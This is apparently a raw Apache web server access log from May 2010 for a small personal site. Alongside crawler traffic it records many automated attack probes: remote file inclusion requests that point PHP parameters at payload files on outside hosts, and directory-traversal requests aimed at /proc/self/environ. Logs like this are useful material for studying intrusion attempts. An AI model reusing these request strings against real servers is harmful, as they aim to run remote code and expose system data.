210.125.133.87 - - [02/May/2010:22:00:15 -0500] "GET /logs/access_log.1270598400%20%20/index0.php?show=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
210.125.133.87 - - [02/May/2010:22:00:15 -0500] "GET /index0.php?show=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
210.125.133.87 - - [02/May/2010:22:00:15 -0500] "GET /logs/index0.php?show=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
210.125.133.87 - - [02/May/2010:22:00:47 -0500] "GET /index0.php?show=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
210.125.133.87 - - [02/May/2010:22:00:47 -0500] "GET /logs/index0.php?show=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
210.125.133.87 - - [02/May/2010:22:00:47 -0500] "GET /logs/access_log.1270598400%20%20/index0.php?show=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
210.125.133.87 - - [02/May/2010:22:03:17 -0500] "GET /logs/access_log.1270684800%20%20/index0.php?show=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
210.125.133.87 - - [02/May/2010:22:03:17 -0500] "GET /logs/access_log.1270684800%20%20/index0.php?show=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
87.250.255.243 - - [02/May/2010:22:07:30 -0500] "GET /logs/access_log.1252800000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.199.193 - - [02/May/2010:22:15:33 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [02/May/2010:22:16:51 -0500] "GET /logs/access_log.1271462400 HTTP/1.0" 200 716852 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [02/May/2010:22:20:35 -0500] "GET /logs/access_log.1248393600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
82.96.90.170 - - [02/May/2010:22:24:26 -0500] "GET /logs//index.php?mode='&dbconfig_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
82.96.90.170 - - [02/May/2010:22:24:26 -0500] "GET /logs//index.php?mode='&dbconfig_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
82.96.90.170 - - [02/May/2010:22:24:26 -0500] "GET //index.php?mode='&dbconfig_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
82.96.90.170 - - [02/May/2010:22:24:26 -0500] "GET //index.php?mode='&dbconfig_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
67.195.112.180 - - [02/May/2010:22:24:43 -0500] "GET /costume/thmb6.htm HTTP/1.0" 200 3210 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
218.38.34.19 - - [02/May/2010:22:27:29 -0500] "GET //setup.php?dir=http://www.villantomagazin.com//1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
218.38.34.19 - - [02/May/2010:22:27:29 -0500] "GET /logs/access_log.1262736000//setup.php?dir=http://www.villantomagazin.com//1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
218.38.34.19 - - [02/May/2010:22:27:29 -0500] "GET /logs/access_log.1264809600//setup.php?dir=http://www.villantomagazin.com//1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
218.38.34.19 - - [02/May/2010:22:27:29 -0500] "GET /logs//setup.php?dir=http://www.villantomagazin.com//1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
87.250.255.243 - - [02/May/2010:22:27:44 -0500] "GET /tattoo/set4.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
82.96.90.170 - - [02/May/2010:22:28:32 -0500] "GET /logs//index.php?mode='&dbconfig_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
82.96.90.170 - - [02/May/2010:22:28:33 -0500] "GET //index.php?mode='&dbconfig_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
82.96.90.170 - - [02/May/2010:22:28:35 -0500] "GET /logs//index.php?mode='&dbconfig_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
82.96.90.170 - - [02/May/2010:22:28:35 -0500] "GET //index.php?mode='&dbconfig_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
121.190.102.21 - - [02/May/2010:22:30:32 -0500] "GET /logs//yabbse/Sources/Packages.php?sourcedir=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
121.190.102.21 - - [02/May/2010:22:30:32 -0500] "GET /logs/access_log.1265155200//yabbse/Sources/Packages.php?sourcedir=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
121.190.102.21 - - [02/May/2010:22:30:32 -0500] "GET //yabbse/Sources/Packages.php?sourcedir=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
121.190.102.21 - - [02/May/2010:22:30:44 -0500] "GET /logs/access_log.1264032000//yabbse/Sources/Packages.php?sourcedir=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
202.67.9.202 - - [02/May/2010:22:31:00 -0500] "GET /logs/access_log.1268611200%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://freetrannydownloads.com/linktrade/lc1.txt? HTTP/1.1" 404 364 "-""Mozilla/5.0"
202.67.9.202 - - [02/May/2010:22:31:00 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://freetrannydownloads.com/linktrade/lc1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
202.67.9.202 - - [02/May/2010:22:31:00 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://freetrannydownloads.com/linktrade/lc1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
121.190.102.21 - - [02/May/2010:22:31:49 -0500] "GET //yabbse/Sources/Packages.php?sourcedir=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
121.190.102.21 - - [02/May/2010:22:31:49 -0500] "GET /logs/access_log.1265155200//yabbse/Sources/Packages.php?sourcedir=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
121.190.102.21 - - [02/May/2010:22:31:49 -0500] "GET /logs//yabbse/Sources/Packages.php?sourcedir=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
121.190.102.21 - - [02/May/2010:22:31:59 -0500] "GET /logs/access_log.1264032000//yabbse/Sources/Packages.php?sourcedir=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
121.190.102.21 - - [02/May/2010:22:34:52 -0500] "GET //yabbse/Sources/Packages.php?sourcedir=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
121.190.102.21 - - [02/May/2010:22:34:52 -0500] "GET /logs//yabbse/Sources/Packages.php?sourcedir=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
121.190.102.21 - - [02/May/2010:22:34:53 -0500] "GET /logs/access_log.1265155200//yabbse/Sources/Packages.php?sourcedir=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
121.190.102.21 - - [02/May/2010:22:35:04 -0500] "GET //yabbse/Sources/Packages.php?sourcedir=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
121.190.102.21 - - [02/May/2010:22:35:05 -0500] "GET /logs//yabbse/Sources/Packages.php?sourcedir=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
121.190.102.21 - - [02/May/2010:22:35:05 -0500] "GET /logs/access_log.1265155200//yabbse/Sources/Packages.php?sourcedir=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
121.190.102.21 - - [02/May/2010:22:35:43 -0500] "GET /logs/access_log.1264032000//yabbse/Sources/Packages.php?sourcedir=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
121.190.102.21 - - [02/May/2010:22:36:03 -0500] "GET /logs/access_log.1264032000//yabbse/Sources/Packages.php?sourcedir=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
82.96.90.170 - - [02/May/2010:22:37:47 -0500] "GET /logs//index.php?mode='&dbconfig_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
82.96.90.170 - - [02/May/2010:22:37:47 -0500] "GET //index.php?mode='&dbconfig_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
208.115.111.248 - - [02/May/2010:22:37:59 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
82.96.90.170 - - [02/May/2010:22:38:08 -0500] "GET /logs//index.php?mode='&dbconfig_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
82.96.90.170 - - [02/May/2010:22:38:09 -0500] "GET //index.php?mode='&dbconfig_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
82.96.90.170 - - [02/May/2010:22:41:40 -0500] "GET /logs//index.php?mode='&dbconfig_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
82.96.90.170 - - [02/May/2010:22:41:40 -0500] "GET //index.php?mode='&dbconfig_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
82.96.90.170 - - [02/May/2010:22:41:44 -0500] "GET /logs//index.php?mode='&dbconfig_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
82.96.90.170 - - [02/May/2010:22:41:44 -0500] "GET //index.php?mode='&dbconfig_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
76.73.76.166 - - [02/May/2010:22:44:06 -0500] "GET /logs/access_log.1265760000/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.callways.com/info.txt??? HTTP/1.1" 404 349 "-""libwww-perl/5.810"
76.73.76.166 - - [02/May/2010:22:44:06 -0500] "GET /logs/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.callways.com/info.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.810"
76.73.76.166 - - [02/May/2010:22:44:06 -0500] "GET /components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.callways.com/info.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.810"
76.73.76.166 - - [02/May/2010:22:44:21 -0500] "GET /logs/access_log.1266278400/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.callways.com/info.txt??? HTTP/1.1" 404 349 "-""libwww-perl/5.810"
76.73.76.166 - - [02/May/2010:22:44:43 -0500] "GET /logs/access_log.1266019200/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.callways.com/info.txt??? HTTP/1.1" 404 349 "-""libwww-perl/5.810"
88.148.8.7 - - [02/May/2010:22:45:27 -0500] "GET /logs/access_log.1266019200/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.callways.com/info.txt??? HTTP/1.1" 404 349 "-""libwww-perl/5.810"
88.148.8.7 - - [02/May/2010:22:45:27 -0500] "GET /logs/access_log.1265760000/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.callways.com/info.txt??? HTTP/1.1" 404 349 "-""libwww-perl/5.810"
88.148.8.7 - - [02/May/2010:22:45:27 -0500] "GET /components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.callways.com/info.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.810"
88.148.8.7 - - [02/May/2010:22:45:27 -0500] "GET /logs/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.callways.com/info.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.810"
88.148.8.7 - - [02/May/2010:22:45:40 -0500] "GET /logs/access_log.1266278400/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.callways.com/info.txt??? HTTP/1.1" 404 349 "-""libwww-perl/5.810"
173.2.220.65 - - [02/May/2010:22:52:19 -0500] "GET /logs/access_log.1267142400 HTTP/1.1" 404 310 "http://yandex.ru/msearch?text=Nt+metodist+hospital+classes2010&lr=202""Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_2 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7D11 Safari/528.16"
67.218.116.164 - - [02/May/2010:22:53:56 -0500] "GET /logs/access_log.1257552000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
87.250.255.243 - - [02/May/2010:22:54:50 -0500] "GET /artwork/txt.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
24.182.45.28 - - [02/May/2010:22:55:32 -0500] "GET / HTTP/1.1" 200 1003 "-""Java/1.6.0_15"
92.240.42.10 - - [02/May/2010:22:59:19 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
216.129.119.12 - - [02/May/2010:23:01:06 -0500] "GET /logs/access_log.1230595200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
92.240.42.10 - - [02/May/2010:23:05:26 -0500] "GET /logs/access_log.1268611200/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
92.240.42.10 - - [02/May/2010:23:05:27 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
92.240.42.10 - - [02/May/2010:23:05:27 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
204.236.235.245 - - [02/May/2010:23:07:15 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""ia_archiver (+http://www.alexa.com/site/help/webmasters; crawler@alexa.com)"
204.236.235.245 - - [02/May/2010:23:07:15 -0500] "GET / HTTP/1.0" 200 991 "-""ia_archiver (+http://www.alexa.com/site/help/webmasters; crawler@alexa.com)"
87.250.255.243 - - [02/May/2010:23:10:56 -0500] "GET /logs/access_log.1270339200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
92.240.42.10 - - [02/May/2010:23:10:57 -0500] "GET /logs/access_log.1268611200/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
92.240.42.10 - - [02/May/2010:23:10:58 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
92.240.42.10 - - [02/May/2010:23:10:58 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
208.115.111.248 - - [02/May/2010:23:13:56 -0500] "GET /artwork/ HTTP/1.1" 200 11078 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [02/May/2010:23:13:58 -0500] "GET /memorial/ HTTP/1.1" 404 293 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [02/May/2010:23:14:01 -0500] "GET /tattoo/ HTTP/1.1" 200 466 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
67.195.112.180 - - [02/May/2010:23:17:51 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [02/May/2010:23:31:02 -0500] "GET /logs/access_log.1237680000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
118.217.216.132 - - [02/May/2010:23:32:09 -0500] "GET /include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://incesp.com/id1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
118.217.216.132 - - [02/May/2010:23:32:09 -0500] "GET /logs/include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://incesp.com/id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
118.217.216.132 - - [02/May/2010:23:32:09 -0500] "GET /logs/access_log.1264809600/include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://incesp.com/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
118.217.216.132 - - [02/May/2010:23:33:44 -0500] "GET /logs/include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://incesp.com/id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
118.217.216.132 - - [02/May/2010:23:33:44 -0500] "GET /logs/access_log.1264809600/include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://incesp.com/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
118.217.216.132 - - [02/May/2010:23:33:44 -0500] "GET /include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://incesp.com/id1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
200.98.197.72 - - [02/May/2010:23:34:43 -0500] "POST /_vti_bin/_vti_aut/author.dll HTTP/1.1" 404 312 "-""core-project/1.0"
220.80.108.70 - - [02/May/2010:23:36:52 -0500] "GET /logs//index.php?option=com_weblinks&&mosConfig.absolute.path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
220.80.108.70 - - [02/May/2010:23:36:52 -0500] "GET //index.php?option=com_weblinks&&mosConfig.absolute.path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
220.80.108.70 - - [02/May/2010:23:36:52 -0500] "GET /logs/access_log.1265760000//index.php?option=com_weblinks&&mosConfig.absolute.path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
220.80.108.70 - - [02/May/2010:23:36:54 -0500] "GET /logs/access_log.1266019200//index.php?option=com_weblinks&&mosConfig.absolute.path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
220.80.108.70 - - [02/May/2010:23:39:13 -0500] "GET //index.php?option=com_weblinks&&mosConfig.absolute.path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
220.80.108.70 - - [02/May/2010:23:39:14 -0500] "GET /logs/access_log.1265760000//index.php?option=com_weblinks&&mosConfig.absolute.path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
220.80.108.70 - - [02/May/2010:23:39:14 -0500] "GET /logs//index.php?option=com_weblinks&&mosConfig.absolute.path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
220.80.108.70 - - [02/May/2010:23:39:15 -0500] "GET /logs/access_log.1266019200//index.php?option=com_weblinks&&mosConfig.absolute.path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
84.40.30.37 - - [02/May/2010:23:41:58 -0500] "GET /logs/access_log.1270684800//cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 337 "-""Mozilla/5.0"
84.40.30.37 - - [02/May/2010:23:41:58 -0500] "GET //cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
84.40.30.37 - - [02/May/2010:23:41:58 -0500] "GET /logs//cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 315 "-""Mozilla/5.0"
87.250.255.243 - - [02/May/2010:23:42:34 -0500] "GET /costume/thmb7.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.195.231 - - [02/May/2010:23:45:24 -0500] "GET /costume/costume1.htm HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
210.245.85.109 - - [02/May/2010:23:47:14 -0500] "GET /index.php?openfile=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
210.245.85.109 - - [02/May/2010:23:47:14 -0500] "GET /logs/access_log.1262995200/index.php?openfile=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
210.245.85.109 - - [02/May/2010:23:47:14 -0500] "GET /logs/index.php?openfile=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
207.46.199.182 - - [02/May/2010:23:48:07 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
110.45.146.38 - - [02/May/2010:23:50:47 -0500] "GET /logs//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://francophonie.utm.md/fx29id1.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
110.45.146.38 - - [02/May/2010:23:50:47 -0500] "GET //components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://francophonie.utm.md/fx29id1.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
110.45.146.38 - - [02/May/2010:23:50:47 -0500] "GET /logs/access_log.1263772800//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://francophonie.utm.md/fx29id1.txt??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
210.118.170.118 - - [02/May/2010:23:52:37 -0500] "GET /logs//?phpbb_root_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 4119 "-""Mozilla/5.0"
210.118.170.118 - - [02/May/2010:23:52:37 -0500] "GET //?phpbb_root_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
110.45.146.38 - - [02/May/2010:23:55:54 -0500] "GET //com_bsq_sitestats/external/rssfeed.php?baseDir=http://francophonie.utm.md/fx29id1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
110.45.146.38 - - [02/May/2010:23:55:54 -0500] "GET /logs/access_log.1264723200//com_bsq_sitestats/external/rssfeed.php?baseDir=http://francophonie.utm.md/fx29id1.txt??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
110.45.146.38 - - [02/May/2010:23:55:54 -0500] "GET /logs//com_bsq_sitestats/external/rssfeed.php?baseDir=http://francophonie.utm.md/fx29id1.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
110.45.146.38 - - [02/May/2010:23:55:59 -0500] "GET /logs/access_log.1263772800//com_bsq_sitestats/external/rssfeed.php?baseDir=http://francophonie.utm.md/fx29id1.txt??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
75.136.121.230 - - [02/May/2010:23:56:36 -0500] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/111/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
75.136.121.230 - - [02/May/2010:23:56:36 -0500] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/111/id1.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
75.136.121.230 - - [02/May/2010:23:56:37 -0500] "GET /logs/access_log.1270598400/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/111/id1.txt?? HTTP/1.1" 404 384 "-""Mozilla/5.0"
87.250.255.243 - - [03/May/2010:00:01:08 -0500] "GET /logs/access_log.1269561600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
121.190.102.21 - - [03/May/2010:00:09:10 -0500] "GET /logs/help.php?css_path=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
121.190.102.21 - - [03/May/2010:00:09:10 -0500] "GET /help.php?css_path=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 292 "-""Mozilla/5.0"
121.190.102.21 - - [03/May/2010:00:09:10 -0500] "GET /logs/access_log.1263772800/help.php?css_path=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
121.190.102.21 - - [03/May/2010:00:09:10 -0500] "GET /logs/access_log.1263168000/help.php?css_path=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
205.234.232.151 - - [03/May/2010:00:09:50 -0500] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.unixon-stats.co.cc/extras/idxx.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
205.234.232.151 - - [03/May/2010:00:09:50 -0500] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.unixon-stats.co.cc/extras/idxx.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
205.234.232.151 - - [03/May/2010:00:09:50 -0500] "GET /logs/access_log.1270684800%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.unixon-stats.co.cc/extras/idxx.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
205.234.232.151 - - [03/May/2010:00:09:55 -0500] "GET /logs/access_log.1270684800/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.unixon-stats.co.cc/extras/id.txt??? HTTP/1.1" 404 363 "-""libwww-perl/5.831"
205.234.232.151 - - [03/May/2010:00:09:55 -0500] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.unixon-stats.co.cc/extras/id.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.831"
205.234.232.151 - - [03/May/2010:00:09:55 -0500] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.unixon-stats.co.cc/extras/id.txt??? HTTP/1.1" 404 341 "-""libwww-perl/5.831"
205.234.232.151 - - [03/May/2010:00:09:55 -0500] "GET /logs/access_log.1268611200/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.unixon-stats.co.cc/extras/id.txt??? HTTP/1.1" 404 363 "-""libwww-perl/5.831"
205.234.232.151 - - [03/May/2010:00:10:03 -0500] "GET /logs/access_log.1270684800/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.unixon-stats.co.cc/extras/id.txt??? HTTP/1.1" 404 363 "-""libwww-perl/5.831"
205.234.232.151 - - [03/May/2010:00:10:03 -0500] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.unixon-stats.co.cc/extras/id.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.831"
205.234.232.151 - - [03/May/2010:00:10:03 -0500] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.unixon-stats.co.cc/extras/id.txt??? HTTP/1.1" 404 341 "-""libwww-perl/5.831"
205.234.232.151 - - [03/May/2010:00:10:04 -0500] "GET /logs/access_log.1268611200/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.unixon-stats.co.cc/extras/id.txt??? HTTP/1.1" 404 363 "-""libwww-perl/5.831"
